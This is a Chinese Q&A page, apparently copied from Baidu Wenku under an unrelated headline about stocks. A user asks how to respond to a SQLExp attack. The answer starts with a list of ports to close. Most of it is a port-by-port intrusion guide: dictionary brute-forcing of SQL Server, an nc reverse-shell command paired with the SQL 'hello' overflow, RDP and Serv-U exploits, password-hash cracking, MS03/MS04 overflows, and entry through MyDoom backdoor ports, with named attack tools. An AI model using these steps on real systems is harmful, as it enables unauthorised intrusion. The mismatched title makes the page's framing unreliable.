为什么有的股票不能买:如何应对SQLExp攻击?

来源:百度文库 编辑:中科新闻网 时间:2024/05/13 05:20:09
近期金山网镖提示机器受到了SQLExp的攻击,应当如何应对?请赐着.

只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。
端口 协议 应用程序
? 21 TCP FTP
? 25 TCP SMTP
? 53 TCP DNS
? 80 TCP HTTP SERVER
? 1433 TCP SQL SERVER
? 5631 TCP PCANYWHERE
? 5632 UDP PCANYWHERE
? 6(非端口) IP协议
? 8(非端口) IP协议
将下面的端口关闭
TCP
? 21
? 22
? 23
? 25 TCP SMTP
? 53 TCP DNS
? 80
? 135 epmap
? 138 [冲击波]
? 139 smb
? 445
? 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
? 1026 DCE/12345778-1234-abcd-ef00-0123456789ac
? 1433 TCP SQL SERVER
? 5631 TCP PCANYWHERE
? 5632 UDP PCANYWHERE
? 3389
? 4444[冲击波]
? 4489
? UDP
? 67[冲击波]
? 137 netbios-ns
? 161 An SNMP Agent is running/ Default community names of the SNMP Agent
端口入侵:
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

下面的网址可能对你有所帮助